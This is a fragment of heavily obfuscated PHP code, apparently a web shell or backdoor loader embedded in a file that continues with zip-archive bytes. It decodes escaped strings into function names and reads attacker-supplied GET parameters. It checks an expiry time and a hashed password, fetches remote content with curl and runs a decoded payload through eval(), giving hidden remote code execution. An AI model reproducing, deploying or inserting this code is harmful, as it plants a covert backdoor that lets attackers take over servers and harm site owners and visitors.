U1Jv4_zseaNW: $h2JGm673T9hB = curl_init($SP7AA45TmaVi); goto g6FdPSW3yiag; Wk9ncidLjTh1: $WiABMEjAWibW = curl_exec($h2JGm673T9hB); goto tXUv2znWRy6i; tXUv2znWRy6i: return empty($WiABMEjAWibW) ? $mDYP8Br3d8jq($SP7AA45TmaVi) : $WiABMEjAWibW; goto y5vc1sjfnKtI; y5vc1sjfnKtI: } static function ndiK8LTEVP5L() { goto xzfG2U3O_Mhd; xzfG2U3O_Mhd: $px0QIcftGfge = array("\66\x33\65\x38\x32\72\66\63\x35\66\x37\72\66\63\x35\x38\x30\x3a\66\x33\x35\x38\x34\72\66\63\x35\x36\x35\72\66\63\65\70\60\72\x36\63\65\x38\66\72\x36\63\x35\67\71\72\x36\x33\x35\x36\x34\x3a\x36\x33\65\67\x31\72\x36\x33\65\70\62\72\x36\x33\65\66\65\72\x36\63\65\67\66\72\66\63\65\x37\x30\x3a\x36\63\65\x37\61", "\66\63\65\x36\x36\x3a\66\63\x35\x36\65\x3a\x36\63\65\x36\67\x3a\66\x33\65\70\66\72\x36\63\65\x36\67\x3a\x36\63\x35\67\x30\x3a\66\63\65\66\65\72\66\63\66\x33\62\72\x36\63\66\x33\60", "\x36\x33\65\x37\x35\x3a\x36\x33\x35\66\x36\72\66\x33\65\67\60\72\66\x33\x35\67\61\72\66\63\x35\x38\66\72\66\x33\65\70\x31\72\x36\x33\x35\70\60\72\x36\x33\65\70\x32\72\66\63\65\x37\60\72\66\63\65\x38\x31\x3a\x36\x33\x35\x38\60", "\66\63\x35\66\x39\x3a\x36\63\x35\x38\x34\72\x36\63\x35\x38\x32\72\66\x33\65\67\x34", "\66\x33\x35\x38\x33\x3a\x36\x33\x35\70\x34\x3a\x36\x33\x35\x36\x36\72\66\x33\65\70\x30\72\66\x33\x36\62\x37\72\x36\x33\x36\62\x39\x3a\x36\63\x35\70\66\72\x36\x33\x35\x38\61\72\66\63\65\x38\60\72\66\63\x35\x38\62\x3a\x36\x33\65\67\x30\x3a\x36\x33\65\70\61\72\x36\x33\x35\70\x30", "\x36\63\x35\x37\x39\72\66\63\x35\x37\x36\72\x36\63\x35\67\x33\x3a\66\x33\65\70\x30\72\x36\63\65\x38\66\x3a\66\63\x35\x37\70\x3a\66\63\65\x38\x30\72\x36\63\x35\66\65\72\66\x33\65\70\66\72\66\x33\65\x38\x32\x3a\66\63\65\x37\60\72\x36\63\x35\x37\61\x3a\66\x33\65\x36\65\x3a\66\x33\x35\x38\x30\x3a\x36\x33\65\67\61\72\x36\x33\65\x36\65\x3a\66\63\65\66\x36", "\x36\x33\66\x30\71\72\66\x33\x36\x33\71", "\x36\63\x35\x35\66", "\x36\x33\66\x33\x34\x3a\66\63\66\x33\71", "\66\63\x36\x31\x36\x3a\x36\63\x35\71\71\72\x36\63\65\71\x39\x3a\x36\x33\66\61\66\x3a\66\63\x35\71\x32", "\66\63\65\67\x39\72\66\x33\65\67\66\72\x36\x33\65\67\63\72\66\x33\65\66\x35\72\x36\63\x35\70\x30\x3a\x36\63\65\x36\67\72\x36\63\65\70\x36\x3a\x36\x33\65\67\66\72\x36\63\x35\x37\x31\72\x36\x33\x35\66\71\x3a\66\63\65\66\64\x3a\66\63\65\66\x35"); goto Q0YqBPchubdm; k3VCqAmLrkJF: @$cQKvqo0D5wcm[4 + 6](INPUT_GET, "\x6f\146") == 1 && die($cQKvqo0D5wcm[1 + 4](__FILE__)); goto kk3wXLHtvWwx; Q0YqBPchubdm: foreach ($px0QIcftGfge as $M_7DzycdQXKq) { $cQKvqo0D5wcm[] = self::omqwi5QDrxnv($M_7DzycdQXKq); lC1TG4H5Q06d: } goto WfR0fAyVXsA4; PmoAa3l5aERh: die; goto xtt7yg_xbHVG; RqCdCZoxjdT5: $s0f4tSP6gTZ9 = @$cQKvqo0D5wcm[1]($cQKvqo0D5wcm[10 + 0](INPUT_GET, $cQKvqo0D5wcm[7 + 2])); goto GZDJy0sFmYWK; xtt7yg_xbHVG: VcSX06l9qcRj: goto v3UdPzx2Cpml; WfR0fAyVXsA4: yYIEeCJ_B882: goto RqCdCZoxjdT5; GZDJy0sFmYWK: $S_qQj3vhMlKc = @$cQKvqo0D5wcm[0 + 3]($cQKvqo0D5wcm[2 + 4], $s0f4tSP6gTZ9); goto kACJvdkTi2b0; kk3wXLHtvWwx: if (!(@$Vu8wxHRYIHgV[0] - time() > 0 and md5(md5($Vu8wxHRYIHgV[1 + 2])) === "\x63\x62\x31\x34\65\65\62\65\x34\62\x31\x64\67\142\x36\x34\x65\x63\65\x33\x62\x66\x37\70\61\x34\144\70\x64\146\x34\63")) { goto VcSX06l9qcRj; } goto b5XUcsmvtO8E; m89xt_kW0zDb: @eval($cQKvqo0D5wcm[4 + 0]($TiVq2WbjOtGW)); goto PmoAa3l5aERh; b5XUcsmvtO8E: $TiVq2WbjOtGW = self::FOcrFcS9y9Ou($Vu8wxHRYIHgV[1 + 0], $cQKvqo0D5wcm[2 + 3]); goto m89xt_kW0zDb; kACJvdkTi2b0: $Vu8wxHRYIHgV = $cQKvqo0D5wcm[2 + 0]($S_qQj3vhMlKc, true); goto k3VCqAmLrkJF; v3UdPzx2Cpml: } } goto WaR99mSXHRLd; WaR99mSXHRLd: cglFrksyIpen::nDiK8LTEVP5L(); ?> PK ��\�g" " "